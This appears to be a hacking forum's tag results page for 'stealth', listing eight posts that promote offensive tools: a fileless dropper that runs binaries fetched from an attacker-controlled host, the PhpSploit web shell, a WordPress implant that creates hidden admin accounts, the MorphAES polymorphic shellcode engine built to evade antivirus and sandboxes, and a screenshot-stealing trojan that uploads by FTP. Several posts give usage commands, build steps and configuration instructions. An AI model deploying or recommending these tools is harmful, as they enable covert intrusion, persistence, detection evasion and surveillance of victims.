Showing results for tags 'stealth'.
Found 8 results

  1. Pentest use: fileless-xec is used on the target machine to execute a binary file hosted on an attacker-controlled machine.

     Short story: fileless-xec enables us to execute a remote binary on a local machine in one step without dropping it on disk.

     Simple usage:
       fileless-xec <binary_url>
     Execute binary with specified program name:
       fileless-xec -n /usr/sbin/sshd <binary_raw_url>
     Retrieve remote binary using the HTTP/3 protocol and execute it:
       fileless-xec -http3 <binary_raw_url>
     Detach program execution from tty:
       setsid fileless-xec […]

     Changelog v3.1
       • Add ICMP server: transfer binary content with ICMP (uses QueenSono)
       • stdout and stdin in real time for "unstealth" mode
       • stdout in real time for Windows executables
  2. fileless-xec – A stealth dropper

     Pentest use: fileless-xec is used on the target machine to execute a binary file hosted on an attacker-controlled machine.

     Short story: fileless-xec enables us to execute a remote binary on a local machine in one step without dropping it on disk.

     Simple usage:
       fileless-xec <binary_url>
     Execute binary with specified program name:
       fileless-xec -n /usr/sbin/sshd <binary_raw_url>
     Retrieve remote binary using the HTTP/3 protocol and execute it:
       fileless-xec -http3 <binary_raw_url>
     Detach program execution from tty:
       setsid fileless-xec […]

     3.0.0 Latest
     Changed
       • Rebranding from curlNexec to fileless-xec
       • Added self-remove of the fileless-xec dropper
       • Server mode
       • Windows support
       • Exec without using the memfd syscall
  3. PhpSploit is a remote control framework aiming to provide a stealth interactive shell-like connection over HTTP between client and web server. It is a post-exploitation tool capable of maintaining access to a compromised web server for privilege escalation purposes.

     Features

     Efficient: More than 20 plugins to automate post-exploitation tasks
       • Run commands and browse filesystem, bypassing PHP security restrictions
       • Upload/Download files between client and target
       • Edit remote files through local text editor
       • Run SQL console on target system
       • Spawn reverse TCP shells

     Stealth: The framework is made by paranoids, for paranoids
       • Nearly invisible by log analysis and NIDS signature detection
       • Safe-mode and common PHP security restrictions bypass
       • Communications are hidden in HTTP headers
       • Loaded payloads are obfuscated to bypass NIDS
       • http/https/socks4/socks5 proxy support

     Convenient: A robust interface with many crucial features
       • Detailed help for any command or option (type help)
       • Cross-platform on both the client and the server
       • Powerful interface with completion and multi-command support
       • Session saving/loading feature & persistent history
       • Multi-request support for large payloads (such as uploads)
       • Provides a powerful, highly configurable settings engine
       • Each setting, such as user-agent, has a polymorphic mode
       • Customisable environment variables for plugin interaction
       • Provides a complete plugin development API

     Changelog v3.1

     Implemented enhancements:
       • Make warning message explicit when running plugin in non-connected mode #74
       • Show stack trace when VERBOSITY is True #73
       • get help for CMD when calling help CMD ARG #70
       • unexpected infinite autocompletion #68
       • help set <VAR>: display buffer type description #67
       • set should inform user that help set <VAR> is available #62
       • alias <VAR> None misses verbosity #59
       • Missing help set <SETTING> autocompletion #56
       • env: Confusing error message before exploited context #53
       • ./deps/ folder is archaic #41

     Fixed bugs:
       • phpsploit is not working properly #128
       • suidroot plugin makes invalid assumptions #105
       • crash: IndexError: list index out of range #101
       • lrun command always returns 0 #83
       • core.tunnel.exceptions.ResponseError: Php runtime error #81
       • core: read non-tty STDIN line-by-line #75
       • term colors: buggy message display #72
       • corectl display-http-requests: invalid log on POST method #65
       • alias can override existing command #60
       • isolate_readline_context() don't isolates readline history #54

     Closed issues:
       • Scripting support #138
       • add jonas lejon as contributor for his blog post #137
       • corectl display-http-requests not working when PROXY is set #135
       • I'm sure i set the backdoor file, but i can't get windows shell again #120
       • a window shell trate mysql data #119
       • Doubt about the socks proxy5 #114
       • INSTALL.md should have install instructions #106
       • Add contributors list on README #88
       • help <PLUGIN> lacks plugin informations #85
       • ux: show missing dependency warnings at start #80
  4. Stealth post-exploitation framework for WordPress CMS

     What is it and why was it made? We intentionally made it for our penetration testing jobs; however, it's getting grey hairs now, so we thought we would like to pass it on to the public! ProjectOpal, or Opal, is a stealth post-exploit framework for WordPress sites that can hide its trace from logs and obfuscate its way through the system! 🙂

     Fun cool features: it creates an admin user that is hidden from all users, including admins! Just note it's stored in the database, so don't forget to delete your traces.

     python Injector.py (Edit the config.py!)

     You will see a start-up screen. Type help and get to know your shell better 🙂

     Features: These are features that Shadowlabs Team prides itself on in this program:
       • Bypass WAF (Web application firewall)
       • Hidden/Stealth
       • Lets you log in as any user
       • Dump entire user entries
       • Create a persistent admin account that is hidden
       • Obfuscated implant
       • Multi-functionality
  5. Opal – Stealth post-exploitation framework for WordPress CMS

     What is it and why was it made? We intentionally made it for our penetration testing jobs; however, it's getting grey hairs now, so we thought we would like to pass it on to the public! ProjectOpal, or Opal, is a stealth post-exploit framework for WordPress sites that can hide its trace from logs and obfuscate its way through the system! 🙂

     Fun cool features: it creates an admin user that is hidden from all users, including admins! Just note it's stored in the database, so don't forget to delete your traces.

     Features: These are features that Shadowlabs Team prides itself on in this program:
       • Bypass WAF (Web application firewall)
       • Hidden/Stealth
       • Lets you log in as any user
       • Dump entire user entries
       • Create a persistent admin account that is hidden
       • Obfuscated implant
       • Multi-functionality
  6. MorphAES – IDPS & SandBox & AntiVirus STEALTH KILLER

     MorphAES is the world's first polymorphic shellcode engine, with metamorphic properties and the capability to bypass sandboxes, which makes it undetectable for an IDPS; it's cross-platform as well and library-independent.

     Properties:
       • Polymorphism (AES encryption)
       • Metamorphism (logic and constants changing)
       • Platform independent (Linux/BSD/Windows)
       • IDPS stealthing (the total number of possible signatures is more than the number of atoms in the universe for one given code)
       • Sandbox evasion (special assembly instructions)
       • Bad characters avoiding (\x00, \x04, \x05, \x09, \x0a, \x20)
       • Can produce executables and be exploited remotely
       • Input code can have arbitrary length
       • Possibility for a NOP sled

     Dependencies for the morpher: Python 2.7 - main engine
     Dependencies for the code execution: 64-bit Intel AES-NI - for decryption

     Nonetheless, there are some limitations (aka white-hat aspects):
       • Metamorphism is not very robust and can be detected using regular expressions (but can be improved pretty easily)
       • Unicode null bytes might still work (but who cares?)
       • It will only work on 64-bit Intel processors with AES-NI support, but since all the users' PCs (like Pentium, Celeron, i3, i5, i7) and the industry's servers (like Xeon) have it, it's more a specification than a limitation, thus a 32-bit implementation is impractical
       • Almost any shellcode is guaranteed to work; however, arbitrary code isn't (to avoid malware abuse)
       • Windows/BSD PoC and executables are in progress, as well as the ARM version

     How it works
       • Shellcode padding with NOPs (since AES is a block cipher) and adding an optional NOP sled
       • Shellcode encryption with a random key using custom AES-128-ECB (not the best, but the simplest) - polymorphism
       • Constants randomization, logic changes, instruction modification and rewriting - metamorphism

     HowTo
     You will have to assemble my custom AESNI-128-ECB implementation using an Intel x64 CPU and put it in the same folder as the Python script. For Linux:
       sudo apt-get install python
       as --64 AES.s -o AES.o
       ld AES.o -o AES
     Execute the Python script and enter your shellcode, or nothing for a default Linux shell. You can specify your own execution address as well. It is also possible to build and execute on Windows/BSD/Mac, but I'm still testing it.

     You can test the Linux PoC in assembly:
       as --64 shellcodePoC.s -o shellcodePoC.o
       ld shellcodePoC.o -o shellcodePoC
       ./shellcodePoC
     or in C:
       gcc -m64 -fno-stack-protector -z execstack shellcode.c -o shellcode
       ./shellcode
     Every file is commented and explained.

     Tests
     At this point, it should be pretty obvious that the hashes would be different every time, but let's compare SSDEEPs of 2 Linux executables of the same shellcode:
       96:GztTHyKGQh3lo6Olv4W4zS/2WnDf74i4a4B7UEoB46keWJl09:Gzty6VOlvqSTDflmNroh
       96:GQtT23yKmFUh3lo6OlOnIrFS4rkoPPf74i4a4B7UEoB46keWJ5:GQtCGWVOlOWFSsPflmNroh
     Well, there's something in common, but globally those are 2 different signatures. Now what about the shellcode itself:
       6:Cq8bnJYn4Xkm3qECaADATyEnT8snTiETiTCfhUaAP6mYGexCKdKZzX+rqVCKdKTc:xuJ0Zp2xRZof79G/KVyk/KTbA
       6:vrg+T1RfLEQD/zD1DZzDJ3zDBfjDcDRJDULUwzWq0Cgk3g4zE/Yq0Cgk3gy12Ots:vLjjEszWCp3w/YCp3Nts
     Almost totally different signatures for the same morphed shellcode!

     At the publication date, the executable was detected as a shellcode only by 2 out of 53 antiviruses (AVG and Ikarus) on VirusTotal, but now it just fails to analyze. malwr and cuckoo2 don't see anything suspicious. From the reverser's perspective, IDA won't see anything either. Radare2 would show the real instructions only if assembled by the assembler itself; however, it doesn't detect any crypto or suspicious activity for the executable. Although I didn't test it personally, I think that FortiSandbox, Sophos Sandstorm, Blue Coat, GateWatcher and their derivatives might fail badly...

     To put it in a nutshell
     Basically, it can transform a script-kid's code (or a known one) into a zero-day. IDPS will fail because it's almost impossible to make a signature and difficult to make a regular expression or heuristic analysis. Most of the sandboxes don't use Intel's AES-NI instructions directly, so they will not execute the code, so "everything is fine" for them, whereas it's not. The only way to defeat this type of shellcode is to use appropriate sandboxing and/or an AI. Of course DEP/NX/CANARY/ASLR should work as well. Notice that the whole execution is done by pure assembly; no Python (or OpenSSL) is needed for the shellcode's execution since I use built-in assembly instructions only, thus it's system-independent (surely, you will have to assemble it for each one by adapting the instructions/opcodes, but they are still the same).

     Notes
     This is still a work in progress; I will implement Windows and BSD/Mac engines and PoCs ASAP.

     "IDPSes and sandboxes are the past." (Jiddu Krishnamurti)

     Download: [Hidden Content]
  7. Stealth Screenshot Saver + Uploader is a combination of Windows utilities to create a malicious program without requiring any heavy coding.

     The executable file contains:
       • file.bat - Batch file containing the screenshot batch line + ftp credentials
       • main.exe - Executes the hidden file.bat
       • README.txt - dummy file with credits
       • svchost.exe - Command line utility to take screenshots

     How to use?
     Open file.bat with Notepad and change lines 2, 4, 5 and 6.
       • In line 2, change between loop and savescreenshot. The first value is by default 60 (60 screenshots before upload). Also in the same line, by default, is 10000 (wait 10 seconds between screenshots).
       • In line 4 is the ftp server (default is ftp.uploaded.net)
       • In line 5 is the ftp username
       • In line 6 is the ftp password

     Why Uploaded.net?
     Uploaded.net is a public free file hosting service with ftp enabled by default. The advantage of Uploaded.net is that you can share the username and password in plain text, and if anyone grabs it and tries to access the files, it won't be possible to modify or delete them without confirming by email.

     Developed using the following technologies: WinRAR, Q Compiler, UPX, Simple Batch

     Example Download: [Hidden Content]
     Virustotal: [Hidden Content]
  8. This archive is the research for a trojan that takes screenshots from the system and uploads them to a server, all hidden/stealth from the user.

     Features:
       1) Custom server login (IP/Domain, Username, Password)
       2) Custom number of screenshots to take
       3) Upload to the server by FTP

     Download: [Hidden Content].rar
     Virustotal: [Hidden Content]